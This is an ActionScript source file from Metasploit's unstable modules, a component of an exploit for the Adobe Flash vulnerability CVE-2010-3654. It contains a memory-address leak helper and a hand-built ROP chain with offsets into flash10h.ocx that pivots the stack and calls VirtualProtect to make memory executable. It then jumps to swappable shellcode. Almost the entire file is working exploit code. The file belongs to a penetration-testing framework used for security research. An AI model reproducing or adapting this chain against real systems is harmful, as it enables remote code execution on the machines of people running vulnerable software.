metasploit-framework/unstable-modules/external/source/exploits/CVE-2010-3654/Real_Ref_Class.as

package poc {

	import flash.display.Sprite
	import flash.utils.*

	public class Real_Ref_Class
	{
		public static function static_func1(objectLeak:uint ,imageBase:uint):String
		{
			var address:uint = objectLeak ;				
			var b:ByteArray = new ByteArray();
			b.writeInt(address);				
				
				
			var str:String = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" + String.fromCharCode(b[3],b[2],b[1],b[0]);
			return str;
		}

		public static function ROPPayload(imageBase:uint ,shellcodeAddrLeak:uint):String
		{
			var b:ByteArray = new ByteArray();				
			var address:uint = imageBase + 0xfa851;		
			var t:ByteArray = new ByteArray();
			t.writeInt(address);				
			b.writeByte(t[3]);
			b.writeByte(t[2]);
			b.writeByte(t[1]);
			b.writeByte(t[0]);					// stack pivot address (flash10h.ocx)
			b.writeUnsignedInt(0x41414141);  
			b.writeUnsignedInt(0x41414141);  
			b.writeUnsignedInt(0x41414141);
			b.writeUnsignedInt(0x41414141);
			b.writeUnsignedInt(0x41414141);
			b.writeUnsignedInt(0x41414141);
			b.writeUnsignedInt(0x41414141);
			b.writeUnsignedInt(0x41414141);
			b.writeUnsignedInt(0x41414141);
			b.writeUnsignedInt(0x41414141);
			b.writeUnsignedInt(0x41414141);
			b.writeUnsignedInt(0x41414141);
			b.writeUnsignedInt(0x41414141);
			b.writeUnsignedInt(0x41414141);
			b.writeUnsignedInt(0x41414141);	
			b.writeUnsignedInt(0x41414141);	
			b.writeUnsignedInt(0x41414141);
			b.writeUnsignedInt(0x41414141);			
			address = imageBase + 0x034D976;		
			t = new ByteArray();
			t.writeInt(address);				
			b.writeByte(t[3]);
			b.writeByte(t[2]);
			b.writeByte(t[1]);
			b.writeByte(t[0]);					//Fill edi, esi, ebp with parameters (flash10h.ocx)
			b.writeUnsignedInt(0x41414141);	
			b.writeUnsignedInt(0x47474747);	
			address = shellcodeAddrLeak;					
			t = new ByteArray();
			t.writeInt(address);				
			b.writeByte(t[3]);
			b.writeByte(t[2]);
			b.writeByte(t[1]);
			b.writeByte(t[0]);					// edi			Shellcode address
			b.writeUnsignedInt(0x00200000);		// esi			size	
			b.writeUnsignedInt(0x40000000);		// ebp			permission
			b.writeUnsignedInt(0x41414141);		
			b.writeUnsignedInt(0x41414141);
			b.writeUnsignedInt(0x41414141);
			b.writeUnsignedInt(0x41414141);
			b.writeUnsignedInt(0x41414141);
			b.writeUnsignedInt(0x41414141);
			b.writeUnsignedInt(0x41414141);
			b.writeUnsignedInt(0x41414141);
			b.writeUnsignedInt(0x41414141);
			address = imageBase + 0x34D962;	
			t = new ByteArray();
			t.writeInt(address);				
			b.writeByte(t[3]);
			b.writeByte(t[2]);
			b.writeByte(t[1]);
			b.writeByte(t[0]);					// call VirtualProtect (flash10h.ocx)
			b.writeUnsignedInt(0x41414141);
			b.writeUnsignedInt(0x41414141);
			b.writeUnsignedInt(0x41414141);
			b.writeUnsignedInt(0x41414141);
			b.writeUnsignedInt(0x41414141);
			b.writeUnsignedInt(0x41414141);
			b.writeUnsignedInt(0x41414141);
			b.writeUnsignedInt(0x41414141);
			b.writeUnsignedInt(0x41414141);
			b.writeUnsignedInt(0x41414141);
			b.writeUnsignedInt(0x41414141);
			b.writeUnsignedInt(0x41414141);						
			address = shellcodeAddrLeak;				
			t = new ByteArray();
			t.writeInt(address);				
			b.writeByte(t[3]);
			b.writeByte(t[2]);
			b.writeByte(t[1]);
			b.writeByte(t[0]);					// shellcode address
			b.writeUnsignedInt(0x41414141);	
			b.writeUnsignedInt(0x41414141);
			b.writeUnsignedInt(0x41414141);
			b.writeUnsignedInt(0x41414141);
			b.writeUnsignedInt(0x41414141);
		
			return b.toString();
		}

		public static function strToInt(param_in:String):uint
		{
			var a:uint = parseInt(param_in);
			a = a | 0x00000007
			return a;
		}

		public static var shell:String = new String();

		public static function setShellcode(buf:String):void
		{
			shell = buf;
		}		
			
		public static function shellcode():String          //return a alphanumeric encoded calc.exe shellcode
		{
			return shell;
		}
				
	}
		
}